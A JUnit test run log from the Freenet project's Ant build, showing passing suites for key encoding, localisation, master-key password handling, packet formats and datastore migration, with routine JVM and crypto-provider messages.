    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,506 sec
    [junit] 
    [junit] Testcase: test took 0,035 sec
    [junit] Running freenet.io.Inet6AddressMatcherTest
    [junit] Testsuite: freenet.io.Inet6AddressMatcherTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,489 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,489 sec
    [junit] 
    [junit] Testcase: test took 0,025 sec
    [junit] Running freenet.io.MessageTest
    [junit] Testsuite: freenet.io.MessageTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,613 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,613 sec
    [junit] 
    [junit] Testcase: test took 0,102 sec
    [junit] Running freenet.keys.ClientCHKBlockTest
    [junit] Testsuite: freenet.keys.ClientCHKBlockTest
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi8597104015519126133lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12046351ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12363920ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 30,534 sec
    [junit] Tests run: 5, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 30,534 sec
    [junit] ------------- Standard Output ---------------
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12046351ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12363920ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testEncodeDecodeNearlyFullBlock took 20,355 sec
    [junit] Testcase: testEncodeDecodeShortInteger took 5,12 sec
    [junit] Testcase: testEncodeDecodeRandomLength took 0,507 sec
    [junit] Testcase: testEncodeDecodeEmptyBlock took 0,044 sec
    [junit] Testcase: testEncodeDecodeFullBlock took 4,072 sec
    [junit] Running freenet.keys.FreenetURITest
    [junit] Testsuite: freenet.keys.FreenetURITest
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi4925345381680209058lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12143503ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12278956ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 8,385 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 8,385 sec
    [junit] ------------- Standard Output ---------------
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12143503ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12278956ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testDeriveRequestURIFromInsertURI took 7,9 sec
    [junit] Testcase: testSskForUSK took 0,007 sec
    [junit] Running freenet.l10n.BaseL10nTest
    [junit] Testsuite: freenet.l10n.BaseL10nTest
    [junit] The default translation for test.nonexistent hasn't been found!
    [junit] java.lang.Exception
    [junit]     at freenet.l10n.BaseL10n.getFallbackString(BaseL10n.java:545)
    [junit]     at freenet.l10n.BaseL10n.access$000(BaseL10n.java:37)
    [junit]     at freenet.l10n.BaseL10n$L10nStringIterator.next(BaseL10n.java:166)
    [junit]     at freenet.l10n.BaseL10n$L10nStringIterator.next(BaseL10n.java:140)
    [junit]     at freenet.l10n.BaseL10n.getString(BaseL10n.java:447)
    [junit]     at freenet.l10n.BaseL10nTest.testGetStringNonexistent(BaseL10nTest.java:188)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
    [junit]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    [junit]     at java.lang.reflect.Method.invoke(Method.java:606)
    [junit]     at junit.framework.TestCase.runTest(TestCase.java:176)
    [junit]     at junit.framework.TestCase.runBare(TestCase.java:141)
    [junit]     at junit.framework.TestResult$1.protect(TestResult.java:122)
    [junit]     at junit.framework.TestResult.runProtected(TestResult.java:142)
    [junit]     at junit.framework.TestResult.run(TestResult.java:125)
    [junit]     at junit.framework.TestCase.run(TestCase.java:129)
    [junit]     at junit.framework.TestSuite.runTest(TestSuite.java:255)
    [junit]     at junit.framework.TestSuite.run(TestSuite.java:250)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.run(JUnitTestRunner.java:523)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.launch(JUnitTestRunner.java:1063)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.main(JUnitTestRunner.java:914)
    [junit] Tests run: 20, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10,014 sec
    [junit] Tests run: 20, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10,014 sec
    [junit] ------------- Standard Error -----------------
    [junit] The default translation for test.nonexistent hasn't been found!
    [junit] java.lang.Exception
    [junit]     at freenet.l10n.BaseL10n.getFallbackString(BaseL10n.java:545)
    [junit]     at freenet.l10n.BaseL10n.access$000(BaseL10n.java:37)
    [junit]     at freenet.l10n.BaseL10n$L10nStringIterator.next(BaseL10n.java:166)
    [junit]     at freenet.l10n.BaseL10n$L10nStringIterator.next(BaseL10n.java:140)
    [junit]     at freenet.l10n.BaseL10n.getString(BaseL10n.java:447)
    [junit]     at freenet.l10n.BaseL10nTest.testGetStringNonexistent(BaseL10nTest.java:188)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
    [junit]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    [junit]     at java.lang.reflect.Method.invoke(Method.java:606)
    [junit]     at junit.framework.TestCase.runTest(TestCase.java:176)
    [junit]     at junit.framework.TestCase.runBare(TestCase.java:141)
    [junit]     at junit.framework.TestResult$1.protect(TestResult.java:122)
    [junit]     at junit.framework.TestResult.runProtected(TestResult.java:142)
    [junit]     at junit.framework.TestResult.run(TestResult.java:125)
    [junit]     at junit.framework.TestCase.run(TestCase.java:129)
    [junit]     at junit.framework.TestSuite.runTest(TestSuite.java:255)
    [junit]     at junit.framework.TestSuite.run(TestSuite.java:250)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.run(JUnitTestRunner.java:523)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.launch(JUnitTestRunner.java:1063)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.main(JUnitTestRunner.java:914)
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testAddL10nSubstitutionMissingBrace took 0,267 sec
    [junit] Testcase: testAddL10nSubstitutionMissingFallback took 0,024 sec
    [junit] Testcase: testAddL10nSubstitutionUnclosedMissing took 0,008 sec
    [junit] Testcase: testAddL10nSubstitutionMissing took 0,009 sec
    [junit] Testcase: testAddL10nSubstitutionSelfNested took 0,009 sec
    [junit] Testcase: testGetStringOverridden took 0,011 sec
    [junit] Testcase: testAddL10nSubstitutionExtra took 0,009 sec
    [junit] Testcase: testAddL10nSubstitution took 0,009 sec
    [junit] Testcase: testAddL10nSubstitutionUnclosed took 0,009 sec
    [junit] Testcase: testGetStringFallbackOverridden took 0,01 sec
    [junit] Testcase: testGetStringNonexistent took 0,047 sec
    [junit] Testcase: testAddL10nSubstitutionDouble took 0,008 sec
    [junit] Testcase: testGetStringFallback took 0,017 sec
    [junit] Testcase: testAddL10nSubstitutionNested took 0,008 sec
    [junit] Testcase: testAddL10nSubstitutionUnmatchedClose took 0,008 sec
    [junit] Testcase: testAddL10nSubstitutionMultiple took 0,009 sec
    [junit] Testcase: testAddL10nSubstitutionSelfNestedEmpty took 0,008 sec
    [junit] Testcase: testGetString took 0,007 sec
    [junit] Testcase: testAddL10nSubstitutionFallback took 0,021 sec
    [junit] Testcase: testStrings took 8,934 sec
    [junit] Running freenet.node.LocationTest
    [junit] Testsuite: freenet.node.LocationTest
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,899 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,899 sec
    [junit] 
    [junit] Testcase: testDistanceAllowInvalid took 0,019 sec
    [junit] Testcase: testNormalize took 0 sec
    [junit] Testcase: testDistance took 0,001 sec
    [junit] Testcase: testChange took 0,004 sec
    [junit] Testcase: testEquals took 0 sec
    [junit] Testcase: testIsValid took 0,001 sec
    [junit] Running freenet.node.MasterKeysTest
    [junit] Testsuite: freenet.node.MasterKeysTest
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi5606170937759971460lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12409068ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12472834ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Writing new master.keys file
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Encrypted password with 50 iterations.
    [junit] Writing new master.keys file
    [junit] Trying to read master keys file...
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Trying to read master keys file...
    [junit] Encrypted password with 130 iterations.
    [junit] Decrypting master keys using password with 130 iterations...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Encrypted password with 760 iterations.
    [junit] Writing new master.keys file
    [junit] Encrypted password with 1230 iterations.
    [junit] Decrypting master keys using password with 1230 iterations...
    [junit] Trying to read master keys file...
    [junit] Decrypting master keys using password with 1230 iterations...
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Writing new master.keys file
    [junit] Encrypted password with 2460 iterations.
    [junit] Decrypting master keys using password with 2460 iterations...
    [junit] Trying to read master keys file...
    [junit] Trying to read master keys file...
    [junit] Decrypting master keys using password with 2460 iterations...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10,656 sec
    [junit] Tests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 10,656 sec
    [junit] ------------- Standard Output ---------------
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12409068ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12472834ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Encrypted password with 50 iterations.
    [junit] Encrypted password with 130 iterations.
    [junit] Decrypting master keys using password with 130 iterations...
    [junit] Encrypted password with 760 iterations.
    [junit] Encrypted password with 1230 iterations.
    [junit] Decrypting master keys using password with 1230 iterations...
    [junit] Decrypting master keys using password with 1230 iterations...
    [junit] Encrypted password with 2460 iterations.
    [junit] Decrypting master keys using password with 2460 iterations...
    [junit] Decrypting master keys using password with 2460 iterations...
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] Writing new master.keys file
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Writing new master.keys file
    [junit] Trying to read master keys file...
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Writing new master.keys file
    [junit] Trying to read master keys file...
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Writing new master.keys file
    [junit] Trying to read master keys file...
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] DELETING FILE tmp.master-keys-test
    [junit] Trying to read master keys file...
    [junit] Creating new master keys file
    [junit] Trying to read master keys file...
    [junit] Read old master keys file
    [junit] DELETING FILE tmp.master-keys-test/test.master.keys
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testChangePasswordEmptyToEmpty took 9,014 sec
    [junit] Testcase: testChangePasswordSomethingToEmpty took 0,138 sec
    [junit] Testcase: testRestartWithPassword took 0,152 sec
    [junit] Testcase: testChangePasswordSomethingToSomething took 0,385 sec
    [junit] Testcase: testChangePasswordEmptyToSomething took 0,267 sec
    [junit] Testcase: testRestartNoPassword took 0,014 sec
    [junit] Running freenet.node.MessageWrapperTest
    [junit] Testsuite: freenet.node.MessageWrapperTest
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,574 sec
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,574 sec
    [junit] 
    [junit] Testcase: testGetFragmentWithLoss took 0,134 sec
    [junit] Testcase: testLost took 0,002 sec
    [junit] Testcase: testGetFragment took 0,001 sec
    [junit] Running freenet.node.NPFPacketTest
    [junit] Testsuite: freenet.node.NPFPacketTest
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi197424770511261387lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] Tests run: 22, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 3,957 sec
    [junit] Tests run: 22, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 3,957 sec
    [junit] ------------- Standard Output ---------------
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testSendEmptyPacket took 0,149 sec
    [junit] Testcase: testPacketWithAck took 0,005 sec
    [junit] Testcase: testSendCompletePacket took 0,025 sec
    [junit] Testcase: testReceiveBadFragment took 0,001 sec
    [junit] Testcase: testEncodeDecodeLossyPerPacketMessages2 took 0,004 sec
    [junit] Testcase: testPacketWithFragments took 0,001 sec
    [junit] Testcase: testSendPacketWithAck took 0 sec
    [junit] Testcase: testSendPacketWithTwoAcks took 0,004 sec
    [junit] Testcase: testReceiveSequenceNumber took 0,001 sec
    [junit] Testcase: testEmptyPacket took 0,001 sec
    [junit] Testcase: testSendPacketWithTwoAcksLong took 0 sec
    [junit] Testcase: testReceiveZeroLengthFragment took 0 sec
    [junit] Testcase: testReceiveLongFragmentedMessage took 0,001 sec
    [junit] Testcase: testSendPacketWithAcks took 0,001 sec
    [junit] Testcase: testEncodeDecodeLossyPerPacketMessages2Padded took 2,813 sec
    [junit] Testcase: testReceivedLargeFragment took 0 sec
    [junit] Testcase: testLength took 0 sec
    [junit] Testcase: testPacketWithFragment took 0,02 sec
    [junit] Testcase: testSendPacketWithAckRange took 0 sec
    [junit] Testcase: testEncodeDecodeLossyPerPacketMessages took 0,003 sec
    [junit] Testcase: testPacketWithAcks took 0,001 sec
    [junit] Testcase: testSendPacketWithFragment took 0,001 sec
    [junit] Running freenet.node.NewPacketFormatTest
    [junit] Testsuite: freenet.node.NewPacketFormatTest
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12498625ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12406267ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 14,78 sec
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 14,78 sec
    [junit] ------------- Standard Output ---------------
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12498625ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12406267ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testLoadStatsSendWhenPeerWants took 1,141 sec
    [junit] Testcase: testResendAlreadyCompleted took 0,206 sec
    [junit] Testcase: testLostLastAck took 3,213 sec
    [junit] Testcase: testLoadStatsLowLevel took 0,208 sec
    [junit] Testcase: testLoadStatsHighLevel took 0,203 sec
    [junit] Testcase: testSequenceNumberEncryption took 8,279 sec
    [junit] Testcase: testReceiveUnknownMessageLength took 0,003 sec
    [junit] Testcase: testAckOnlyCreation took 0,402 sec
    [junit] Testcase: testEmptyCreation took 0,015 sec
    [junit] Testcase: testOutOfOrderDelivery took 0,003 sec
    [junit] Testcase: testEncryption took 0,548 sec
    [junit] Running freenet.node.NodeTest
    [junit] Testsuite: freenet.node.NodeTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,531 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,531 sec
    [junit] 
    [junit] Testcase: testDefaultStoreSizeSanity took 0,007 sec
    [junit] Running freenet.node.PeerMessageQueueTest
    [junit] Testsuite: freenet.node.PeerMessageQueueTest
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,6 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,6 sec
    [junit] 
    [junit] Testcase: testUrgentTimeEmpty took 0,127 sec
    [junit] Testcase: testUrgentTime took 0,006 sec
    [junit] Testcase: testGrabQueuedMessageItem took 0,01 sec
    [junit] Testcase: testUrgentTimeQueuedWrong took 0,002 sec
    [junit] Running freenet.node.probe.ErrorTest
    [junit] Testsuite: freenet.node.probe.ErrorTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,616 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,616 sec
    [junit] 
    [junit] Testcase: testValidCodes took 0,017 sec
    [junit] Testcase: testInvalidCodes took 0,005 sec
    [junit] Running freenet.node.probe.TypeTest
    [junit] Testsuite: freenet.node.probe.TypeTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,475 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,475 sec
    [junit] 
    [junit] Testcase: testValidCodes took 0,012 sec
    [junit] Testcase: testInvalidCodes took 0,006 sec
    [junit] Running freenet.pluginmanager.PluginStoreTest
    [junit] Testsuite: freenet.pluginmanager.PluginStoreTest
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,383 sec
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,383 sec
    [junit] 
    [junit] Testcase: testStringsWithInvalidChars took 0,039 sec
    [junit] Testcase: testWriteStringArrays took 0,004 sec
    [junit] Testcase: testRandom took 0,733 sec
    [junit] Running freenet.store.PubkeyStoreTest
    [junit] Testsuite: freenet.store.PubkeyStoreTest
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi948726083168094314lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,803 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,803 sec
    [junit] ------------- Standard Output ---------------
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testSimple took 2,369 sec
    [junit] Running freenet.store.RAMSaltMigrationTest
    [junit] Testsuite: freenet.store.RAMSaltMigrationTest
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi7194115120188342437lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12211695ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12343605ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-false/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-false/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-false/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-50-false/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-50-false/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-50-false/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
